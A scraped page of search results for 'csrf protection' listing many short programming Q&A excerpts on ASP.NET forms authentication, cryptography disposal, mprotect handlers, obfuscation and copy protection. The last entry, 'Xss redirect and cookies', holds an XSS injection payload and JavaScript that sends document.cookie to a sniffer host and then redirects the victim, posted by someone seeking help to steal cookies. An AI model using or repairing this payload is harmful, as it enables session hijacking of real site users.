Search Results

Search found 1306 results on 53 pages for 'csrf protection'.

Page 37/53 | < Previous Page | 33 34 35 36 37 38 39 40 41 42 43 44 | Next Page >

Can't explain why not redirecting after login using RedirectFromLogin

- by Blankman

I am using ASP.NET MVC, on my login action I am doing: [AcceptVerbs("POST")] public ActionResult Login(FormCollection form) { User validatedUser = // tests username/pwd here. FormsAuthentication.RedirectFromLoginPage( validatedUser.ID.ToString(), rememberMe); if(String.IsNullOrEmpty(Request["ReturnUrl"])) string redirectUrl = Request["ReturnUrl"]; if (!String.IsNullOrEmpty(Request.QueryString["ReturnUrl"])) string redirectUrl = Request["ReturnUrl"]; } My url looks like this when I am on the login page: http://localhost:56112/user/login?ReturnUrl=/admin/settings Does anything look wrong here? My web.config: <authentication mode="Forms"> <forms loginUrl="/user/login" protection="All" timeout="30" name="SomeCookie" requireSSL="false" slidingExpiration="true" defaultUrl="default.aspx" />

Read the article
How do I manually Dispose RSACryptoServiceProvider?

- by phq

I have read on MSDN(see Important note) that RSACryptoServiceProvider must be disposed. They give the example: using (RSACryptoServiceProvider RSA = new RSACryptoServiceProvider()) Now I'm trying to include RSACryptoServiceProvider into MyClass making use of it in several Methods. With this setup I cannot use the using statement. Instead I try to call the .Dispose() Method of the RSACryptoServiceProvider object at a suitable time but then I get the compile error message: `System.Security.Cryptography.AsymmetricAlgorithm.Dispose(bool)' is inaccessible due to its protection level Is RSACryptoServiceProvider not supposed to be used longer than one function call(using the using statement)? How can I fix this, is not making the Dispose call an option?

Read the article
Correct permutation cycle for Verhoeff algorithm

- by James

Hello, I'm implementing the Verhoeff algorithm for a check digit scheme, but there seems to be some disagreement in web sources as to which permutation cycle should form the basis of the permutation table. Wikipedia uses: (36)(01589427) while apparently, Numerical Recipies uses a different cycle and this book uses: (0)(14)(23)(56789), quoted from a 1990 article by Winters. It also notes that Verhoeff used the one Wikipedia quotes. Now, my number theory is a little rusty, but the Wikipedia cycle clearly will repeat after the 8th power, while the book one will take 10, despite it saying that s^8=s. Table 2.14(b) has other errors in the 2-cycles, so this is dubious anyway. Unfortunately, I don't have copies of the original articles (and am too tight to pay/disgusted that 40-year old knowledge is still being held to ransom by publishers), nor a copy of Numerical Recipes to check (and am loath to install their paranoia-induced copy protection plug-in to view online). So does any one know which is correct? Are they both correct?

Read the article
Stress Test tool for Password Protected Website

- by Jason

We need to run a stress test on a password protection section of a website we host. What tool (paid or free) would be best for us to use for this? We'd like to be able to create several 'scripts' and then have the stress test simulate X number of users. Each script will have us login as a specific user and then click on some links and submit forms to simulate an actual user. Ideally the software would also create some nice data exports/charts. Server is a linux web server, but we could run this on linux or Windows so software that will run on either is fine.

Read the article
Recording SELECT statements in PostgreSQL 8.4

- by David Anniwell

Hi All I've got a table which contains sensitive data and according to data protection policy we have to keep a record of every read/write of the data including a row identifier and the user who accessed the table. The writing is no issue using triggers but obviously triggers aren't supported for SELECT statements. What's the best method of doing this? I've looked at rules but I can't get them to INSERT into a table, and I've tried logging every query but this doesn't seem to log SELECT statements. Ideally for security I'd like to keep the log within a table on the database but logging to a file is fine too. Thanks David

Read the article
Free SWF Obfuscator

- by Cyclone

Does anybody know of a free flash obfuscator? All I can find are commercial ones with free trials. I have done numerous google searches, and have been unable to find what I am looking for. I know that obfuscators do not make your swf hack proof, but they make things harder. Things I am looking for in an obfuscator: Unlimited obfuscations No time limit No watermark (or on the left side only! Right side is no good, same with center) Able to publish work (no special player needed other than standard flashplayer) I really was surprised to see how hard it was to find a good obfuscator (tried encoder, protection, etc. instead as well) and how easy it is to find a decompiler.... It is imperative that my code be protected, at least partially, to discourage the hacking of my game.

Read the article
C SIGSEGV Handler & Mprotect

- by pws5068

I'm constructing a program which uses mprotect() to restrict a block of memory from accessing. When the memory is requested, a SIGSEGV is thrown which I listen for using a signal() call. Once the SIGSEGV has been detected, I need to somehow access the pointer to the memory that was requested (that threw the fault) and the size of the segment requested. Is this possible? void fifoSigHandler(){ // Needs to only remove protection from requested block of virtual memory mprotect(fifoVm,(size_t)fifoVm_size,PROT_WRITE); printf("Caught Seg Fault"); } void fifo_init(void* vm, int vm_size, int n_frames, int page_size) { fifoVm = vm; fifoVm_size = vm_size; fifoFrames = n_frames; fifoPageSize = page_size; mprotect(fifoVm,(size_t)fifoVm_size,PROT_NONE); signal(SIGSEGV, fifoSigHandler); } Additionally, is there a way to determine the level of mprotect() a block of memory is currently assigned (PROT_NONE,PROT_READ, etc..)?

Read the article
ssis Connection manager password ("DontSaveSensitive")

- by swapna

Hi, I have a SSIS package used the protection level as "DontSaveSensitive" So initially i have saved the oledb connection manager password as in a XML config file.And this worked fine for me. Now for business requiremnt i have stored the configuration in sql server. Including password. Initially it worked fine.But suddenly connection manager is not taking password from sqlDB. If i set an environment variable for the "password" it's working. My question is. 1) what is the solution for this.( i can only save the configurations in sql) 2) initially how it worked.I mean initailly from sql server the password was taking. Please give some clue.I am doing a lot of trial and error. Thanks SNA

Read the article
How come you cannot catch Code Contract exceptions?

- by Finglas

System.Diagnostics.Contracts.ContractException is not accessiable in my test project. Note this code is purely myself messing around with my shiney new copy of Visual Studio, but I'd like to know what I'm doing wrong. I'm using the professional edition of VS, therefore I do not have static checking. In order to still use code contracts (which I like) I figured the only way my method can work is to catch the exception that is thrown at runtime, but I'm not finding this possible. TestMethod [TestMethod, ExpectedException(typeof(System.Diagnostics.Contracts.ContractException))] public void returning_a_value_less_than_one_throws_exception() { var person = new Person(); person.Number(); } Method public int Number() { Contract.Ensures(Contract.Result<int>() >= 0); return -1; } Error Error 1 'System.Diagnostics.Contracts.ContractException' is inaccessible due to its protection level.

Read the article
Are there white lists for Yahoo, Gmail, Hotmail and AOL?

- by Waleed Eissa

In my website (under development), the members can send messages to each other which are sent directly to their email, now I'm worried that some members can send spam to other members (I have a spam filter but it doesn't give 100% protection as you know), I'm worried that my domain might get blacklisted on Yahoo, Gmail, Hotmail or AOL which will cause any messages sent from my domain to end up in the spam folder, this is why I want to add the domain of my website to their whitelists (if they exist). P.S. I don't want to use private messages that members check on the site and I have my reason for this. Thanks

Read the article
Remove HTTP headers from a raw response

- by Ed

Let's say we make a request to a URL and get back the raw response, like this: HTTP/1.1 200 OK Date: Wed, 28 Apr 2010 14:39:13 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: PREF=ID=e2bca72563dfffcc:TM=1272465553:LM=1272465553:S=ZN2zv8oxlFPT1BJG; expires=Fri, 27-Apr-2012 14:39:13 GMT; path=/; domain=.google.co.uk Server: gws X-XSS-Protection: 1; mode=block Connection: close <!doctype html><html><head>...</head><body>...</body></html> What would be the best way to remove the HTTP headers from the response in C#? With regexes? Parsing it into some kind of HTTPResponse object and using only the body? EDIT: I'm using SOCKS to make the request, that's why I get the raw response.

Read the article
Error processing response in .net web service with WSE3 mutualCertificate10Security Assertion

- by Maeloc

I am securing a .net web service (framework 2.0) with WSE3 mutualCertificate10Security Assertion. When request are valid all is fine and the response is wellformed, but when the request is invalid (cause a invalid signature, failed check, or soapexception thrown), the web server isn't able to process the response to send to the client. The error in application event log is: An error occured processing an outgoing fault response. Details of the error causing the processing failure: System.InvalidOperationException: Send security filter on the server could not retrieve the operation protection requirements from the operation state. en Microsoft.Web.Services3.Security.SecureConversationServiceSendSecurityFilter.SecureMessage(SoapEnvelope envelope, Security security) en Microsoft.Web.Services3.Security.SendSecurityFilter.ProcessMessage(SoapEnvelope envelope) en Microsoft.Web.Services3.Pipeline.ProcessOutputMessage(SoapEnvelope envelope) en Microsoft.Web.Services3.WseProtocol.GetFilteredResponseEnvelope(SoapEnvelope outputEnvelope) All certificate permissions are OK (when request is OK the web service is able to sign the response). Error occurs only if a soapFault must be returned in the response. Any ideas?

Read the article
protect php result

- by siko

hii i had simple php file to protect wmv files from downloading and stolen the file is like this <?php // get-file.php $id = (isset($_GET["id"])) ? strval($_GET["id"]) : "1"; // lookup $url[1] = 'http://mlfat.ledawy.net/Files/eng/moslslat/mosque/1.wmv'; $url[2] = 'URL'; $url[3] = 'URL'; header('Content-Type: text/plain'); echo("$url[$id]"); ?> and i embedd the movies like this http:// mlfat.ledawy.net/Files/eng/moslslat/mosque/mosque.php?id=1 but if you call this link you can find the source url can i have some protection ?? tried a lot of adding a php session variable so that the script can not be accessed directly. thank you

Read the article
.net open auth?

- by chobo2

Hi I know stackoverflow uses open authentication. I want to try and use this as well. I am using asp.net mvc 2.0 with C#. I found this http://www.dotnetopenauth.net/ and I am wondering if this is what was used for stackoverflow. Also any tutorials would be nice as well. Edit I am trying to load up some sample projects but when I build it in VS2010 I get Error 6 'System.Diagnostics.Contracts.ContractInvariantMethodAttribute' is inaccessible due to its protection level C:\Users\chobo2\Downloads\DotNetOpenAuth-3.4.6.10357\DotNetOpenAuth-3.4.6.10357\Samples\OpenIdOfflineProvider\TextBoxTextWriter.cs 73 4 OpenIdOfflineProvider Error 7 The type or namespace name 'ContractInvariantMethod' could not be found (are you missing a using directive or an assembly reference?) C:\Users\chobo2\Downloads\DotNetOpenAuth-3.4.6.10357\DotNetOpenAuth-3.4.6.10357\Samples\OpenIdOfflineProvider\TextBoxTextWriter.cs 73 4 OpenIdOfflineProvider

Read the article
Users being forced to re-login randomly, before session and auth ticket timeout values are reached

- by Don

I'm having reports and complaints from my user that they will be using a screen and get kicked back to the login screen immediately on their next request. It doesn't happen all the time but randomly. After looking at the Web server the error that shows up in the application event log is: Event code: 4005 Event message: Forms authentication failed for the request. Reason: The ticket supplied has expired. Everything that I read starts out with people asking about web gardens or load balancing. We are not using either of those. We're a single Windows 2003 (32-bit OS, 64-bit hardware) Server with IIS6. This is the only website on this server too. This behavior does not generate any application exceptions or visible issues to the user. They just get booted back to the login screen and are forced to login. As you can imagine this is extremely annoying and counter-productive for our users. Here's what I have set in my web.config for the application in the root: <authentication mode="Forms"> <forms name=".TcaNet" protection="All" timeout="40" loginUrl="~/Login.aspx" defaultUrl="~/MyHome.aspx" path="/" slidingExpiration="true" requireSSL="false" /> </authentication> I have also read that if you have some locations setup that no longer exist or are bogus you could have issues. My path attributes are all valid directories so that shouldn't be the problem: <location path="js"> <system.web> <authorization> <allow users="*" /> </authorization> </system.web> </location> <location path="images"> <system.web> <authorization> <allow users="*" /> </authorization> </system.web> </location> <location path="anon"> <system.web> <authorization> <allow users="*" /> </authorization> </system.web> </location> <location path="App_Themes"> <system.web> <authorization> <allow users="*" /> </authorization> </system.web> </location> <location path="NonSSL"> <system.web> <authorization> <allow users="*" /> </authorization> </system.web> </location> The only thing I'm not clear on is if my timeout value in the forms property for the auth ticket has to be the same as my session timeout value (defined in the app's configuration in IIS). I've read some things that say you should have the authentication timeout shorter (40) than the session timeout (45) to avoid possible complications. Either way we have users that get kicked to the login screen a minute or two after their last action. So the session definitely should not be expiring. Update 2/23/09: I've since set the session timeout and authentication ticket timeout values to both be 45 and the problem still seems to be happening. The only other web.config in the application is in 1 virtual directory that hosts Community Server. That web.config's authentication settings are as follows: <authentication mode="Forms"> <forms name=".TcaNet" protection="All" timeout="40" loginUrl="~/Login.aspx" defaultUrl="~/MyHome.aspx" path="/" slidingExpiration="true" requireSSL="true" /> </authentication> And while I don't believe it applies unless you're in a web garden, I have both of the machine key values set in both web.config files to be the same (removed for convenience): <machineKey validationKey="<MYVALIDATIONKEYHERE>" decryptionKey="<MYDECRYPTIONKEYHERE>" validation="SHA1" /> <machineKey validationKey="<MYVALIDATIONKEYHERE>" decryptionKey="<MYDECRYPTIONKEYHERE>" validation="SHA1"/> Any help with this would be greatly appreciated. This seems to be one of those problems that yields a ton of Google results, none of which seem to be fitting into my situation so far.

Read the article
Penalty clause on programming contract

- by Everyone

I am considering the move to the other side of development, as a contract programmer. SO has given me a good few hints on the kind of figures to quote ( and why ), and a few points to bear in mind such as Non-competition and [IP Protection] Having worked as a programmer for a while, I know that a few reasons for deadline delays may be - Estimates can be all over the place both from the Contractor, and the Job provider Things like bandwidth bottlenecks, merge for high-impact code etc Clarification time on provided requirements... etc If you have worked as a contract programmer then How frequently do you encounter a penalty/forfeit clause in your agreement? What do you deem unacceptable in the penalty/forfeit clause?

Read the article
Can I make controls defined in my markup public instead of protected

- by RoboShop

Say I have a web site with a master page and an aspx page. In my ASPX page, I am pointing to my masterpage with the MasterType tag. <%@ MasterType VirtualPath="~/mymasterpage.master" % Say, I've defined a label in the markup of my master page. If you look at the designer code, this label should be something like this. protected global::System.Web.UI.WebControls.Label label1; Now in my content page, I would like to reference this label. If I type in this "Master.label1", the complier will complain that the control is inaccessible due to the protection level" and rightly so, as label1 is automatically defined as "protected". My question is, if I define controls in my markup page, is it possible to set these controls as public instead of protected? I do not see an attribute for it. thanks in advance.

Read the article
ASP.NET Page Unauthorization for common pages

- by Mahesh

Hi I am developing a web application which has form based authentication. All pages needs to be authenticated except AboutUs and ContactUs pages. I configured everything correct except AboutUs and ContactUs pages. Since I am denying all users in authorization section, application is redirecting even if the customer browse AboutUs and ContactUs pages. Configuration Rules <authentication mode= "Forms"> <forms name=".ASPXAUTH" loginUrl="Login.aspx" timeout="20" protection="All" slidingExpiration="true" /> </authentication> <authorization> <deny users="?" /> </authorization> Could you please let me know how can I tell asp.net to remove these pages for authorization?? Thanks, Mahesh

Read the article
Protect .NET assemblies from decomplie

- by Holli

One if the first things I learned when I started with C# was the most important one. You can decompile any .NET assembly with Reflector or other tools. Many developers are not aware of this fact and most of them are shocked when I show them their source code. Protection against decompilation is still a difficult task. I am still looking for a fast, easy and secure way to do it. I don't want to obfuscate my code so my method names will be a,b,c or so. Reflector or other tools should be unable to recognize my application as .NET assembly at all. I know about some tools already but they are very expensive. Is there any other way to protect my applications?

Read the article
Prevent query string manipulation by adding a hash?

- by saille

To protect a web application from query string manipulation, I was considering adding a query string parameter to every url which stores a SHA1 hash of all the other query string parameters & values, then validating against the hash on every request. Does this method provide strong protection against user manipulation of query string values? Are there any other downsides/side-effects to doing this? I am not particularly concerned about the 'ugly' urls for this private web application. Url's will still be 'bookmarkable' as the hash will always be the same for the same query string arguments. This is an ASP.NET application.

Read the article
ASP.Net Web Forms LoginStatus Multiple LoginURL - suggestions?

- by TGuimond

Hi Guys, I am developing a multi-lingual website. I am determining the requested language via a querystring variable eg: http://mydomain.com/default.aspx?lang=en I am using two <asp:LoginStatus /> controls in my masterpage. My web.config file is set up like this for forms authentication. <authentication mode="Forms"> <forms loginUrl="~/login.aspx" protection="All" timeout="30" name=".ASPXAUTH" path="/" requireSSL="false" slidingExpiration="true" defaultUrl="default.aspx" cookieless="UseDeviceProfile" enableCrossAppRedirects="false"/> </authentication> Currently when you click on a <asp:LoginStatus /> you will be redirected to my login page and the url will look something like this: http://mydomain.com/login.aspx?ReturnUrl=%2fdefault.aspx%3flang%3den What solutions are available to me so that I can append my lang variable to my login.aspx? depending on which language is currently active?

Read the article
App not shown in 2.1 Market

- by an

I published several free and paid app in the Market. I recently get several complains from customers about not finding my app in the 2.1 Market. Even if they have bought them before, they can't find it in the market or their download list after updating to 2.1. Can anyone tell me what the problem is? My apps only require minimal SDK 3.. Thanks a lot!! Update: It looks like that they are not shown because they have copy protection enabled. Is this a bug in the Market?

Read the article
How to implement a good system for login/out into a webapp

- by Brandon Wang

I am one of the developers at PassPad, a secure password generator and username storage system. We're still working on it, but I have a few questions on the best way to implement a secure login/out system. Right now, what we plan on doing is to have the login system save a cookie with the username and a session key, and that's all that serves as authentication. The server verifies the two to match. Upon login/out a new key is created. This is a security-related webapp and while we don't actually store any information that might make the user queasy, because it is security-oriented it makes it a necessity for us to at least appear secure in a way that the user would be happy with. Is there a better way to implement a login/out system in PHP? Preferably it won't take too much coding time or server resources. Is there anything else I need to implement, like brute-force protection, etc? How would I go about that?

Read the article
Prevent Casual Piracy for Simple Utility

- by Chad

I've written a small utility that I wish to sell for less than $10. My primary concern is "casual piracy". The scenario that plays out in my mind is this: User buys the program, enjoys using it and tells their friends. The friends copy the application to their USB drives and take it home - using the application for free (maybe never realizing they should have purchased it. Since I've got absolutely no protection built in, it would just be a simple copy'n paste to pirate the app. The users who would be using the app are in close proximity to each other (work in the same environment), so casual piracy would likely occur frequently. Any ideas? Keeping in mind the app is cheap (partly to reduce casual piracy), and the level of effort to write the app hasn't been very demanding. Update: the app will run on any system that supports .NET 3.5.

Read the article
Xss redirect and cookies

- by user1824906

I found Active XSS on one site. I need to steal cookies and after it to make redirect on other site. This site has a non-frame protection I tried to put "><script src='http://site.ru/1.js' /></script>" http://site.ru/1.js contains: img = new Image(); img.src = "http:/sniffer.com/nasdasdnu.gif?"+document.cookie; var URL = "http://images.cards.mail.ru/11bolprivet.jpg" var speed = 100; function reload() { document.location = URL } setTimeout("reload()", speed); But it doesn't work=\ Any help?

Read the article

< Previous Page | 33 34 35 36 37 38 39 40 41 42 43 44 | Next Page >